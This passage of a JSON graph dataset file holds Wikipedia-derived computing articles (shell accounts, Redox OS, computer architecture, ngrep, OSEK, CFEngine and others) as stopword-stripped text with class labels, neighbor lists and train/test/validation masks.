    "text": "Shell_account:shell account shell account user account remote server traditionally running unix operating system gives access shell via command-line interface protocol telnet ssh shell accounts made first accessible interested members public internet service providers netcom usa panix world digex although rare instances individuals access shell accounts employer university used file storage web space email accounts newsgroup access software development shell providers often found offer shell accounts low-cost free shell accounts generally provide users access various software services including compilers irc clients background processes ftp text editors nano email clients pine shell providers may also allow tunneling traffic bypass corporate firewalls",
    "neighbors": [
      7364,
      10341,
      8998,
      11112,
      9868,
      9839,
      8432,
      11442,
      5492,
      10933,
      3030,
      823,
      1304,
      7325
    ],
    "mask": "None"
  },
  {
    "node_id": 9931,
    "label": 2,
    "text": "Redox_(operating_system):redox operating system redox unix-like microkernel operating system written programming language rust language strong focus safety stability high performance redox aims secure usable free redox inspired prior kernels operating systems minix plan 9 bsd similar gnu bsd ecosystem memory-safe language modern technology free open-source software distributed mit license redox operating system designed highly secure reflected several design decisions redox full-featured operating system providing packages memory allocator file system display manager core utilities etc together make functional operating system redox relies ecosystem software written rust members project redox supports command-line interface cli programs including redox supports graphical user interface gui programs including redox created jeremy soller first published 20 april 2015 github since developed actively contributions 40 developers second anniversary redox appearing github version 0.2.0 released",
    "neighbors": [
      3587,
      2179,
      4998,
      7561,
      6675,
      7187,
      5397,
      6300,
      10016,
      9762,
      11180,
      7983,
      5049,
      10813,
      9151,
      8262,
      2761,
      5067,
      7889,
      11221,
      5976,
      9176,
      477,
      2786,
      10851,
      5356,
      5363,
      5492,
      11123,
      8700,
      9343
    ],
    "mask": "Test"
  },
  {
    "node_id": 9932,
    "label": 3,
    "text": "Computer_architecture:computer architecture computer engineering computer architecture set rules methods describe functionality organization implementation computer systems definitions architecture define describing capabilities programming model computer particular implementation definitions computer architecture involves instruction set architecture design microarchitecture design logic design implementation first documented computer architecture correspondence charles babbage ada lovelace describing analytical engine building computer z1 1936 konrad zuse described two patent applications future projects machine instructions could stored storage used data i.e stored-program concept two early important examples term “ architecture ” computer literature traced work lyle r. johnson frederick p. brooks jr. members machine organization department ibm ’ main research center 1959 johnson opportunity write proprietary research communication stretch ibm-developed supercomputer los alamos national laboratory time known los alamos scientific laboratory describe level detail discussing luxuriously embellished computer noted description formats instruction types hardware parameters speed enhancements level “ system architecture ” – term seemed useful “ machine organization. ” subsequently brooks stretch designer started chapter 2 book planning computer system project stretch ed w. buchholz 1962 writing brooks went help develop ibm system/360 called ibm zseries line computers “ architecture ” became noun defining “ user needs know ” later computer users came use term many less-explicit ways earliest computer architectures designed paper directly built final hardware form later computer architecture prototypes physically built form transistor–transistor logic ttl computer—such prototypes 6800 pa-risc—tested tweaked committing final hardware form 1990s new computer architectures typically built tested tweaked—inside computer architecture computer architecture simulator inside fpga soft microprocessor both—before committing final hardware form discipline computer architecture three main subcategories types computer architecture following types used bigger companies like intel count 1 computer architecture purpose design computer maximizes performance keeping power consumption check costs low relative amount expected performance also reliable many aspects considered includes instruction set design functional organization logic design implementation implementation involves integrated circuit design packaging power cooling optimization design requires familiarity compilers operating systems logic design packaging instruction set architecture isa interface computer software hardware also viewed programmer view machine computers understand high-level programming languages java c++ programming languages used processor understands instructions encoded numerical fashion usually binary numbers software tools compilers translate high level languages instructions processor understand besides instructions isa defines items computer available program—e.g data types registers addressing modes memory instructions locate available items register indexes names memory addressing modes isa computer usually described small instruction manual describes instructions encoded also may define short vaguely mnemonic names instructions names recognized software development tool called assembler assembler computer program translates human-readable form isa computer-readable form disassemblers also widely available usually debuggers software programs isolate correct malfunctions binary computer programs isas vary quality completeness good isa compromises programmer convenience easy code understand size code much code required specific action cost computer interpret instructions complexity means hardware needed decode execute instructions speed computer complex decoding hardware comes longer decode time memory organization defines instructions interact memory memory interacts design emulation software emulators run programs written proposed instruction set modern emulators measure size cost speed determine particular isa meeting goals computer organization helps optimize performance-based products example software engineers need know processing power processors may need optimize software order gain performance lowest price require quite detailed analysis computer organization example sd card designers might need arrange card data processed fastest possible way computer organization also helps plan selection processor particular project multimedia projects may need rapid data access virtual machines may need fast interrupts sometimes certain tasks need additional components well example computer capable running virtual machine needs virtual memory hardware memory different virtual computers kept separated computer organization features also affect power consumption processor cost instruction set micro-architecture designed practical machine must developed design process called implementation implementation usually considered architectural design rather hardware design engineering implementation broken several steps cpus entire implementation process organized differently often referred cpu design exact form computer system depends constraints goals computer architectures usually trade standards power versus performance cost memory capacity latency latency amount time takes information one node travel source throughput sometimes considerations features size weight reliability expandability also factors common scheme depth power analysis figures keep power consumption low maintaining adequate performance modern computer performance often described ipc instructions per cycle measures efficiency architecture clock frequency since faster rate make faster computer useful measurement older computers ipc counts low 0.1 instructions per cycle simple modern processors easily reach near 1 superscalar processors may reach three five ipc executing several instructions per clock cycle counting machine language instructions would misleading varying amounts work different isas instruction standard measurements count isa actual machine language instructions unit measurement usually based speed vax computer architecture many people used measure computer speed clock rate usually mhz ghz refers cycles per second main clock cpu however metric somewhat misleading machine higher clock rate may necessarily greater performance result manufacturers moved away clock speed measure performance factors influence speed mix functional units bus speeds available memory type order instructions programs two main types speed latency throughput latency time start process completion throughput amount work done per unit time interrupt latency guaranteed maximum response time system electronic event like disk drive finishes moving data performance affected wide range design choices — example pipelining processor usually makes latency worse makes throughput better computers control machinery usually need low interrupt latencies computers operate real-time environment fail operation completed specified amount time example computer-controlled anti-lock brakes must begin braking within predictable short time brake pedal sensed else failure brake occur benchmarking takes factors account measuring time computer takes run series test programs although benchmarking shows strengths n't choose computer often measured machines split different measures example one system might handle scientific applications quickly another might render video games smoothly furthermore designers may target add special features products hardware software permit specific benchmark execute quickly n't offer similar advantages general tasks power efficiency another important measurement modern computers higher power efficiency often traded lower speed higher cost typical measurement referring power consumption computer architecture mips/w millions instructions per second per watt modern circuits less power required per transistor number transistors per chip grows transistor put new chip requires power supply requires new pathways built power however number transistors per chip starting increase slower rate therefore power efficiency starting become important important fitting transistors single chip recent processor designs shown emphasis put focus power efficiency rather cramming many transistors single chip possible world embedded computers power efficiency long important goal next throughput latency increases clock frequency grown slowly past years compared power reduction improvements driven end moore law demand longer battery life reductions size mobile technology change focus higher clock rates power consumption miniaturization shown significant reductions power consumption much 50 reported intel release haswell microarchitecture dropped power consumption benchmark 30-40 watts 10-20 watts comparing processing speed increase 3 ghz 4 ghz 2002 2006 seen focus research development shifting away clock frequency moving towards consuming less power taking less space",
    "neighbors": [
      8198,
      6155,
      8207,
      2066,
      25,
      27,
      6180,
      6181,
      8231,
      2105,
      2113,
      8259,
      8262,
      6221,
      2137,
      10333,
      97,
      6243,
      4201,
      6250,
      119,
      129,
      2179,
      10382,
      6296,
      2201,
      8352,
      2224,
      178,
      6329,
      2237,
      4286,
      2241,
      2243,
      8388,
      2248,
      8396,
      10455,
      8410,
      219,
      221,
      242,
      10485,
      2294,
      249,
      2302,
      255,
      8450,
      6403,
      6406,
      10508,
      10510,
      6415,
      273,
      6419,
      292,
      2345,
      2355,
      309,
      8501,
      4409,
      6459,
      4417,
      8514,
      4423,
      4424,
      330,
      8523,
      6476,
      2390,
      2396,
      8543,
      8551,
      10603,
      4465,
      376,
      8573,
      2435,
      394,
      4492,
      398,
      6549,
      2462,
      10658,
      421,
      4521,
      4525,
      10669,
      2480,
      10675,
      10676,
      2506,
      6607,
      466,
      2517,
      477,
      4581,
      10725,
      2535,
      8682,
      10730,
      10731,
      10734,
      6639,
      8687,
      499,
      4596,
      8700,
      2558,
      2560,
      8704,
      10752,
      518,
      2574,
      10776,
      10779,
      4637,
      10781,
      8738,
      4643,
      10786,
      10796,
      10803,
      10809,
      2623,
      576,
      2625,
      2638,
      6760,
      10856,
      8815,
      6768,
      630,
      4727,
      8822,
      4729,
      634,
      6787,
      10883,
      10891,
      6797,
      663,
      10909,
      6815,
      6818,
      4773,
      6821,
      679,
      6829,
      8879,
      6837,
      8889,
      8890,
      709,
      6854,
      6858,
      10966,
      731,
      10985,
      8944,
      2804,
      757,
      2805,
      6926,
      785,
      8977,
      787,
      789,
      795,
      6950,
      9003,
      2861,
      4909,
      823,
      4928,
      11075,
      6988,
      9044,
      2901,
      7001,
      7020,
      11117,
      2933,
      7033,
      7039,
      7050,
      11152,
      7057,
      5022,
      9126,
      935,
      936,
      939,
      11184,
      9151,
      11204,
      11205,
      3014,
      9166,
      3025,
      5076,
      7134,
      5090,
      995,
      5105,
      7158,
      5115,
      1029,
      7173,
      9224,
      7187,
      11290,
      7217,
      7218,
      3124,
      7234,
      3142,
      9291,
      3160,
      1122,
      11363,
      7269,
      3175,
      9330,
      7285,
      9335,
      1147,
      1149,
      1150,
      3197,
      5245,
      5247,
      9345,
      11390,
      7311,
      7313,
      9363,
      5272,
      9370,
      3235,
      9391,
      11447,
      5329,
      7377,
      11474,
      7382,
      9436,
      1247,
      11487,
      11489,
      5355,
      7403,
      5358,
      1267,
      5363,
      9466,
      9468,
      5373,
      1278,
      7421,
      5378,
      1298,
      11539,
      5397,
      5404,
      7471,
      7477,
      7483,
      5452,
      5457,
      7505,
      7507,
      11601,
      11604,
      7511,
      5464,
      9559,
      3421,
      1376,
      3426,
      5484,
      11635,
      5492,
      11637,
      1399,
      1402,
      5501,
      5503,
      3457,
      3470,
      5523,
      5529,
      11675,
      1445,
      9643,
      7601,
      1461,
      1462,
      1463,
      7607,
      1474,
      1480,
      3529,
      5578,
      5585,
      9688,
      1499,
      1502,
      5598,
      9707,
      5612,
      9710,
      9714,
      5619,
      7670,
      3581,
      9739,
      7699,
      5655,
      1561,
      9762,
      5677,
      3677,
      7780,
      5739,
      9835,
      3698,
      3702,
      1660,
      5774,
      9882,
      9887,
      5793,
      1702,
      5798,
      7852,
      7858,
      9907,
      3764,
      9911,
      5819,
      5823,
      9926,
      1736,
      5840,
      7911,
      1770,
      9964,
      1776,
      5880,
      1798,
      1801,
      5898,
      1804,
      10016,
      3886,
      7983,
      10030,
      1841,
      5948,
      7998,
      7999,
      10051,
      5956,
      3911,
      1890,
      8048,
      10098,
      8063,
      10113,
      8069,
      3978,
      6036,
      1952,
      10145,
      1967,
      6065,
      4021,
      8122,
      4030,
      6078,
      4036,
      6084,
      4040,
      8136,
      6106,
      6128,
      2039,
      10235,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9933,
    "label": 7,
    "text": "MeshBox:meshbox meshbox item computer hardware used provide large scale wireless broadband networks manufactured locustworld devices designed co-operate meshboxes within range passing internet service one box next air reaches final destination coverage area mesh typically measured square miles square kilometres originally released bootable cd-rom called meshap based openap open source software system implemented system image fit within small 32mb compactflash card system functions expanded beyond creating wireless networks provide set-top box services mp3 audio video streaming connection remote windows terminal servers pcs web browsing connection peer-to-peer networks instant messaging file exchange",
    "neighbors": [
      9098,
      2797,
      10270
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9934,
    "label": 9,
    "text": "Marc_Auslander:marc auslander marc alan auslander american computer scientist known contributions pl/8 compiler spent entire career ibm thomas j. watson research center yorktown heights ny auslander received bachelor arts degree mathematics princeton university 1963 joined ibm year 1991 named ibm fellow retired 2004 continues affiliated ibm fellow emeritus 1996 auslander elected national academy engineering contributions reduced instruction set computing risc systems 1999 named acm fellow ieee fellow contributions risc 1970 1972 auslander served chairman acm sigops authored 19 scientific papers holds 14 u.s. patents",
    "neighbors": [
      3323
    ],
    "mask": "Train"
  },
  {
    "node_id": 9935,
    "label": 0,
    "text": "Distributional_semantics:distributional semantics distributional semantics research area develops studies theories methods quantifying categorizing semantic similarities linguistic items based distributional properties large samples language data basic idea distributional semantics summed so-called distributional hypothesis linguistic items similar distributions similar meanings distributional hypothesis linguistics derived semantic theory language usage i.e words used occur contexts tend purport similar meanings underlying idea word characterized company keeps popularized firth distributional hypothesis basis statistical semantics although distributional hypothesis originated linguistics receiving attention cognitive science especially regarding context word use recent years distributional hypothesis provided basis theory similarity-based generalization language learning idea children figure use words 've rarely encountered generalizing use distributions similar words distributional hypothesis suggests semantically similar two words distributionally similar turn thus tend occur similar linguistic contexts whether suggestion holds significant implications data-sparsity problem computational modeling question children able learn language rapidly given relatively impoverished input also known problem poverty stimulus distributional semantics favor use linear algebra computational tool representational framework basic approach collect distributional information high-dimensional vectors define distributional/semantic similarity terms vector similarity different kinds similarities extracted depending type distributional information used collect vectors topical similarities extracted populating vectors information text regions linguistic items occur paradigmatic similarities extracted populating vectors information linguistic items items co-occur note latter type vectors also used extract syntagmatic similarities looking individual vector components basic idea correlation distributional semantic similarity operationalized many different ways rich variety computational models implementing distributional semantics including latent semantic analysis lsa hyperspace analogue language hal syntax- dependency-based models random indexing semantic folding various variants topic model distributional semantic models differ primarily respect following parameters distributional semantic models use linguistic items context also referred word space vector space models compositional distributional semantic models extension distributional semantic models characterize semantics entire phrases sentences achieved composing distributional representations words sentences contain different approaches composition explored discussion established workshops semeval simpler non-compositional models fail capture semantics larger linguistic units ignore grammatical structure logical words crucial understanding distributional semantic models applied successfully following tasks",
    "neighbors": [
      7780,
      7910,
      11206,
      10577,
      4468,
      5781,
      7577,
      7230
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9936,
    "label": 3,
    "text": "Double_Tools_for_DoubleSpace:double tools doublespace double tools doublespace software utility released 1993 menlo park-based company addstor inc utility functioned add-on disk compression software doublespace supplied ms-dos 6.0 adding number features available standard version double tools utilities worked microsoft windows providing graphical view control panel compressed drives computer utilities supplied ms-dos operated dos-mode double tools also contained number disk checking rescue/recovery utilities included utilities called silent tools one unique features time capability defragment doublespace compressed drive background features including background defragmentation capability required user let double tools replace standard compression driver ms-dos dblspace.bin one developed addstor claimed 100 compatible doublespace microsoft real-time compression interface introduced ms-dos 6.0 driver added number extra features use 32-bit code paths detected intel 80386 higher cpu caching capabilities addition supporting use upper memory area also permitted use extended memory buffers reducing driver total footprint conventional upper memory albeit cost somewhat reduced speed features provided double tools ability compressed removable media auto-mounted used instead user manually although capability later introduced standard version doublespace found ms-dos 6.2 double tools also capability put special utility compressed floppy disks made possible access compressed data even computers n't doublespace double tools another interesting function ability split compressed volume multiple floppy disks able see entire volume first disk inserted prompted change discs necessary also possible share compressed volume remote computer",
    "neighbors": [
      1801,
      6506,
      6797,
      9166,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 9937,
    "label": 5,
    "text": "Nortel_Discovery_Protocol:nortel discovery protocol nortel discovery protocol ndp data link layer osi layer 2 network protocol discovery nortel networking devices certain products avaya ciena device topology information may graphically displayed network management software nortel discovery protocol origin synoptics network management protocol sonmp developed synoptics wellfleet communications merger 1994 protocol rebranded bay network management protocol bnmp protocol analyzers referenced bay discovery protocol bdp four years later 1998 bay networks acquired nortel renamed nortel discovery protocol ieee 802.1ab link layer discovery protocol supported nortel equipment standards based vendor-neutral protocol supports multi-vendor environments",
    "neighbors": [
      9603,
      1284,
      11321,
      11286,
      1303,
      7865,
      3580,
      10175
    ],
    "mask": "Test"
  },
  {
    "node_id": 9938,
    "label": 2,
    "text": "OSEK:osek osek offene systeme und deren schnittstellen für die elektronik kraftfahrzeugen english open systems interfaces electronics motor vehicles standards body produced specifications embedded operating system communications stack network management protocol automotive embedded systems also produced related specifications osek designed provide standard software architecture various electronic control units ecus throughout car supported popular ssl/tls libraries wolfssl optimal security measures osek founded 1993 german automotive company consortium bmw robert bosch gmbh daimlerchrysler opel siemens volkswagen group university karlsruhe 1994 french cars manufacturers renault psa peugeot citroën similar project called vdx vehicle distributed executive joined consortium therefore official name osek/vdx osek open standard published consortium founded automobile industry parts osek standardized iso 17356 documents current osek standard specifies interfaces multitasking functions—generic i/o peripheral access—and thus remains architecture dependent osek systems expected run chips without memory protection features osek implementation usually configured compile-time number application tasks stacks mutexes etc statically configured possible create run time osek recognizes two types tasks/threads/compliance levels basic tasks enhanced tasks basic tasks never block run completion coroutine enhanced tasks sleep block event objects events triggered tasks basic enhanced interrupt routines static priorities allowed tasks first first fifo scheduling used tasks equal priority deadlocks priority inversion prevented priority ceiling i.e priority inheritance specification uses iso/ansi-c-like syntax however implementation language system services specified application binary interface abi also specified comment two claims contradictory 1 static priorities allowed tasks 2 uses priority ceiling states protocol works temporarily raising priorities tasks certain situations thus requires scheduler supports dynamic priority scheduling according german version entry namely scheduling configured two different ways br preemptive scheduling task always preempted means higher priority task. br non-preemptive scheduling task preempted prefixed compile-time points cooperative scheduling br mixed mode also possible autosar consortium reuses osek specifications operating system backwards compatible superset osek os also covers functionality osektime communication module derived osek com osektime specifies standard optional time-triggered real-time operating systems used osektime triggered callbacks run higher priority osek tasks",
    "neighbors": [
      352,
      7234,
      7983,
      10964,
      9366,
      8700,
      6207
    ],
    "mask": "Train"
  },
  {
    "node_id": 9939,
    "label": 4,
    "text": "Ngrep:ngrep ngrep network grep network packet analyzer written jordan ritter command-line interface relies upon pcap library gnu regex library ngrep supports berkeley packet filter bpf logic select network sources destinations protocols also allows matching patterns regular expressions data payload packets using gnu grep syntax showing packet data human-friendly way ngrep open source application source code available download ngrep site sourceforge compiled ported multiple platforms works many unix-like operating systems linux solaris illumos bsd aix also works microsoft windows ngrep similar tcpdump ability look regular expression payload packet show matching packets screen console allows users see unencrypted traffic passed network putting network interface promiscuous mode ngrep appropriate bpf filter syntax used debug plain text protocols interactions like http smtp ftp dns among others search specific string pattern using grep regular expression syntax ngrep also used capture traffic wire store pcap dump files read files generated sniffer applications like tcpdump wireshark ngrep various options command line arguments ngrep man page unix-like operating systems show list available options examples assumed eth0 used network interface ngrep -l -q -d eth0 -i ^get |^post tcp port 80 ngrep -l -q -d eth0 -i user-agent tcp port 80 ngrep -l -q -d eth0 -i udp port 53 capturing raw network traffic interface requires special privileges superuser privileges platforms especially unix-like systems ngrep default behavior drop privileges platforms running specific unprivileged user like tcpdump also possible use ngrep specific purpose intercepting displaying communications another user computer entire network privileged user running ngrep server workstation connected device configured port mirroring switch router gateway connected device used network traffic capture lan man wan watch unencrypted information related login id passwords urls content websites viewed network",
    "neighbors": [
      6797,
      5397,
      5270,
      11413,
      6177,
      10788,
      1064,
      1580,
      10924,
      7983,
      9909,
      823,
      700,
      9665,
      7364,
      2887,
      6345,
      842,
      10705,
      6997,
      7895,
      5469,
      5470,
      9440,
      8432,
      381,
      2292,
      3323,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9940,
    "label": 9,
    "text": "Psake:psake psake domain-specific language build automation tool written powershell create builds using dependency pattern similar rake msbuild intends simplify build language compared msbuild scripting build script consists tasks task function define dependencies task functions following example psake script psake executes task functions enforces dependencies tasks since psake written real programming language xml lot freedom flexibility build scripts use features powershell .net framework within build output running psake script shown",
    "neighbors": [
      9926,
      7983,
      11221,
      3573,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9941,
    "label": 5,
    "text": "HTTP_message_body:http message body http message body data bytes transmitted http transaction message immediately following headers case http/0.9 headers transmitted request/response message consists following request/status line headers must end cr lf carriage return followed line feed empty line must consist cr lf whitespace optional http message body data article defines could response web server message body content example text hello world",
    "neighbors": [
      6629,
      7965,
      3052,
      11674,
      119,
      2901,
      53,
      1206,
      10004,
      10452,
      10938,
      4095,
      5724,
      4797,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9942,
    "label": 1,
    "text": "Intelligent_database:intelligent database 1980s databases viewed computer systems stored record-oriented business data manufacturing inventories bank records sales transactions database system expected merge numeric data text images multimedia information expected automatically notice patterns data stored late 1980s concept intelligent database put forward system manages information rather data way appears natural users goes beyond simple record keeping term introduced 1989 book intelligent databases kamran parsaye mark chignell setrag khoshafian harry wong concept postulated three levels intelligence systems high level tools user interface database engine high level tools manage data quality automatically discover relevant patterns data process called data mining layer often relies use artificial intelligence techniques user interface uses hypermedia form uniformly manages text images numeric data intelligent database engine supports two layers often merging relational database techniques object orientation twenty-first century intelligent databases become widespread e.g hospital databases call patient histories consisting charts text x-ray images mouse clicks many corporate databases include decision support tools based sales pattern analysis",
    "neighbors": [
      2688,
      9481,
      10505,
      10258,
      10518,
      4376,
      9112,
      7968,
      290,
      1314,
      7461,
      8742,
      5550,
      5808,
      10418,
      9527,
      3768,
      3004,
      9661,
      9663,
      4416,
      2369,
      5441,
      11457,
      8518,
      9286,
      72,
      853,
      2901,
      9177,
      987,
      860,
      9183,
      11362,
      10471,
      8808,
      6383,
      4598,
      9079,
      2681,
      9467
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9943,
    "label": 2,
    "text": "Active_Template_Library:active template library active template library atl set template-based c++ classes developed microsoft intended simplify programming component object model com objects com support microsoft visual c++ allows developers create variety com objects ole automation servers activex controls atl includes object wizard sets primary structure objects quickly minimum hand coding com client side atl provides smart pointers deal com reference counting library makes heavy use curiously recurring template pattern com objects also created microsoft foundation classes mfc leads larger binaries require support dlls atl hand lightweight alternative situations graphical user interface parts mfc required atl version 7 visual studio 2003 directly succeeded version 3 visual studio 6.0 number mfc classes like cstring made available atl precisely moved atlmfc common layer shared libraries atl version 7 also introduced attributes c++ attempt provide something similar cli attributes however particularly successful deemphasized atl version 8 visual studio 2005 various wizards longer generate default version 7 also introduced new string conversion classes july 28 2009 microsoft released patch atl fix bug could allow activex controls created using atl vulnerable remote code execution security flaw since visual studio 2013 atl code visual c++ 2013 static eliminating dll atl includes many raii classes simplify management com types commonly used classes include although formally part atl microsoft visual c++ also includes additional c++ raii classes simplify management com types compiler com support classes used replacement combination atl includes note visual studio 2012 compiler com support classes include safearray wrapper",
    "neighbors": [
      10243,
      9234,
      1043,
      3102,
      1055,
      2083,
      8227,
      1577,
      2603,
      4143,
      9263,
      8246,
      8771,
      4173,
      4178,
      9813,
      10841,
      603,
      5743,
      8303,
      8304,
      9848,
      1656,
      5754,
      9340,
      5761,
      1666,
      9348,
      5765,
      10886,
      2183,
      5259,
      653,
      6797,
      3224,
      4771,
      7846,
      10414,
      214,
      4822,
      9434,
      736,
      4321,
      6370,
      4836,
      1770,
      11498,
      3821,
      10991,
      2804,
      6927,
      9491,
      5401,
      5913,
      8473,
      11546,
      4384,
      2854,
      10024,
      10026,
      10029,
      7983,
      11570,
      5952,
      1347,
      1348,
      844,
      10079,
      11616,
      9579,
      2943,
      9609,
      10654,
      8607,
      9128,
      8618,
      6584,
      2493,
      4550,
      7629,
      8161,
      6114,
      9196,
      4590,
      11247,
      3573,
      10229,
      5119
    ],
    "mask": "Test"
  },
  {
    "node_id": 9944,
    "label": 9,
    "text": "PyMC3:pymc3 pymc3 python package bayesian statistical modeling probabilistic machine learning focuses advanced markov chain monte carlo variational fitting algorithms rewrite scratch previous version pymc software unlike pymc2 used fortran extensions performing computations pymc3 relies theano automatic differentiation also computation optimization dynamic c compilation pymc3 together stan popular probabilistic programming tools pymc3 open source project developed community fiscally sponsored numfocus pymc3 used solve inference problems several scientific domains including astronomy molecular biology crystallography chemistry ecology psychology previous versions pymc also used widely example climate science public health neuroscience parasitology theano announced plans discontinue development 2017 pymc3 team decided 2018 develop new version pymc named pymc4 pivot tensorflow probability computational backend new version beta pymc3 continue primary target development efforts theano backend supported pymc3 team extended period time pymc3 implements non-gradient-based gradient-based markov chain monte carlo mcmc algorithms bayesian inference stochastic gradient-based variational bayesian methods approximate bayesian inference",
    "neighbors": [
      5380,
      5129,
      7945,
      3980,
      2317,
      6797,
      7950,
      11406,
      5397,
      2457,
      7326,
      7983,
      6962,
      6718,
      5830,
      5703,
      4808,
      5833,
      5450,
      2000,
      11221,
      2652,
      10848,
      4840,
      8554,
      5356,
      5612,
      7924,
      3960,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 9945,
    "label": 3,
    "text": "Socket_G2:socket g2 socket g2 also known rpga 988b intel cpu socket used line mobile core i7 successor core 2 line also several mobile core i5 core i3 processors based intel sandy bridge architecture like predecessor socket g1 systems run dual-channel memory mode data rates 1600 mhz opposed triple-channel mode unique lga-1366 platform subsequent xeon sockets socket g2 cpus also known fcpga988 socket processors pin compatible ppga988 although nearly motherboards using socket intended mobile products like laptops desktop boards using exist supermicro example produced number mini itx motherboards using qm77 chipset rpga 989 sockets shown left take socket socket g1 rpga988a socket socket g2 rpga988b supported memory see also",
    "neighbors": [
      3588,
      5901,
      5523,
      4886,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      5073,
      4179,
      3798,
      4185,
      7002,
      10715,
      11484,
      9570,
      10468,
      613,
      8552,
      1260,
      4717,
      10225,
      371,
      9592,
      8442
    ],
    "mask": "Test"
  },
  {
    "node_id": 9946,
    "label": 6,
    "text": "Cd_(command):cd command command also known change directory command-line shell command used change current working directory various operating systems used shell scripts batch files command implemented operating unix dos ibm os/2 metacomco tripos amigaos bare path given cd implied microsoft windows reactos linux ms-dos available versions 2 later dr dos 6.0 also includes implementation commands command also available open source ms-dos emulator dosbox efi shell named hp mpe/ix command analogous stratus openvos command system call affects command operating systems defined posix command line shells windows usually use windows api change current working directory whereas unix systems calls posix c function means command executed new process created migrate directory case commands ls instead shell executes command new process created child process inherits directory parent process created command inherits parent process directory objective command cd never achieved windows powershell microsoft object-oriented command line shell scripting language executes command cmdlet within shell process however since powershell based .net framework different architecture previous shells powershell cmdlets like etc run shell process course true legacy commands still run separate process directory logical section file system used hold files directories may also contain directories command used change subdirectory move back parent directory move way back root directory move given directory consider following subsection unix filesystem shows user home directory represented file three subdirectories user current working directory home directory entering command codice_3 followed might produce following transcript user games directory similar session dos though concept home directory may apply depending specific version would look like dos maintains separate working directories lettered drive also concept current working drive command used change working directory working drive another lettered drive typing drive letter command changes working drive e.g alternatively switch may used change working drive drive working directory one step modern versions windows simulate behaviour backwards compatibility cmd.exe note executing command line arguments different effects different operating systems example executed without arguments dos os/2 windows current working directory displayed equivalent unix codice_4 executed without arguments unix user returned home directory executing command within script batch file also different effects different operating systems dos caller current directory directly altered batch file use command unix caller current directory altered script invocation command unix script usually executed within subshell file transfer protocol respective command spelled control stream available client command-line programs clients also changing working directory locally numerical computing environments matlab gnu octave include codice_5 function similar functionality command also pertains command-line interpreters various application software",
    "neighbors": [
      515,
      9733,
      9735,
      2568,
      521,
      6664,
      6674,
      10771,
      532,
      8729,
      7196,
      9762,
      2599,
      8236,
      9780,
      5703,
      5706,
      3659,
      2637,
      4174,
      7266,
      5220,
      8301,
      1647,
      9839,
      8306,
      4727,
      5754,
      5759,
      8834,
      2181,
      5256,
      6281,
      6797,
      4750,
      10387,
      2198,
      4248,
      6812,
      7325,
      7326,
      4771,
      7847,
      178,
      11442,
      7356,
      10428,
      7364,
      2245,
      4298,
      1741,
      1750,
      6358,
      10967,
      6369,
      11494,
      4850,
      7411,
      9972,
      10484,
      8954,
      3323,
      6396,
      1278,
      7939,
      5384,
      8975,
      3856,
      4369,
      5397,
      808,
      4398,
      7983,
      10033,
      823,
      1336,
      8504,
      5437,
      7486,
      8517,
      9542,
      4423,
      8522,
      3412,
      10068,
      6506,
      1902,
      5492,
      3970,
      10631,
      3976,
      4490,
      11663,
      4001,
      7088,
      1978,
      6075,
      960,
      3522,
      451,
      1987,
      965,
      9166,
      5603,
      8675,
      10727,
      6120,
      491,
      9709,
      2545,
      5106,
      3571,
      506,
      3573,
      8692,
      9204,
      11249,
      6138,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 9947,
    "label": 3,
    "text": "SV-328:sv-328 sv-328 8-bit home computer introduced spectravideo june 1983 business-targeted model spectravideo range sporting rather crowded full-travel keyboard numeric keypad 80 kb ram 64 kb available software remaining 16 kb video memory respectable amount time keyboard ram machine identical little brother sv-318 sv-328 design msx standard based spectravideo msx-compliant successor 328 sv-728 looks almost identical immediately noticeable differences larger cartridge slot central position fit msx standard cartridges lighter shaded keyboard msx badging reference operating system microsoft extended basic confused msx basic although marketing time claimed microsoft extended msx stood back sv-318 sv-328 adapters permit connect peripherals tape drive sv-903 cvbs monitor joysticks however super expander unit options available",
    "neighbors": [
      1121,
      6889,
      1515,
      780,
      3788,
      3406,
      2383,
      1776,
      7983,
      9006,
      9998,
      4409,
      1403,
      2811
    ],
    "mask": "Test"
  },
  {
    "node_id": 9948,
    "label": 2,
    "text": "CFEngine:cfengine cfengine open-source configuration management system written mark burgess primary function provide automated configuration maintenance large-scale computer systems including unified management servers desktops consumer industrial devices embedded networked devices mobile smartphones tablet computers cfengine project began 1993 way author mark burgess post-doctoral fellow royal society oslo university norway get work done automating management small group workstations department theoretical physics like many post-docs phd students burgess ended task managing unix workstations scripting fixing problems users manually scripting took much time flavours unix significantly different scripts maintained multiple platforms drowning exception logic discussing problems colleague burgess wrote first version cfengine configuration engine published internal report presented cern computing conference gained significant attention wider community able hide platform differences using domain-specific language year later burgess finished post-doc decided stay oslo took job lecturing oslo university college realized little research done configuration management set applying principles scientific modelling understanding computer systems short space time developed notion convergent operators remains core cfengine 1998 burgess wrote computer immunology paper usenix/lisa98 conference laid manifesto creating self-healing systems reiterated years later ibm form autonomic computing started research effort led major re-write cfengine 2 added features machine learning anomaly detection secure communications 1998 2004 cfengine grew adoption along popularity linux computing platform time mark burgess developed promise theory model distributed cooperation self-healing automation 2008 five years research cfengine 3 introduced incorporated promise theory way make cfengine simpler powerful time according burgess significant re-write project date cfengine 3 also integrated knowledge management discovery mechanisms—allowing configuration management scale automate enterprise-class infrastructure june 2008 company cfengine formed collaboration author mark burgess oslo university college oslo innovation centre order support users cfengine april 2009 company launched first commercial version cfengine cfengine enterprise enterprise version downloaded free 25 agents clients february 2011 company received first round funding ferd capital company offices oslo norway mountain view california usa cfengine provides operating system-independent interface unix-like host configuration requires expert knowledge deal peculiarities different operating systems power perform maintenance actions across multiple hosts cfengine used windows hosts well widely used managing large numbers unix hosts run heterogeneous operating systems e.g solaris linux aix tru64 hp-ux shortly inception cfengine inspired field research automated configuration management cfengine project claims attempt place problem configuration management scientific framework author mark burgess developed range theoretical tools results talk problem written several text books monographs explaining one main ideas cfengine changes computer 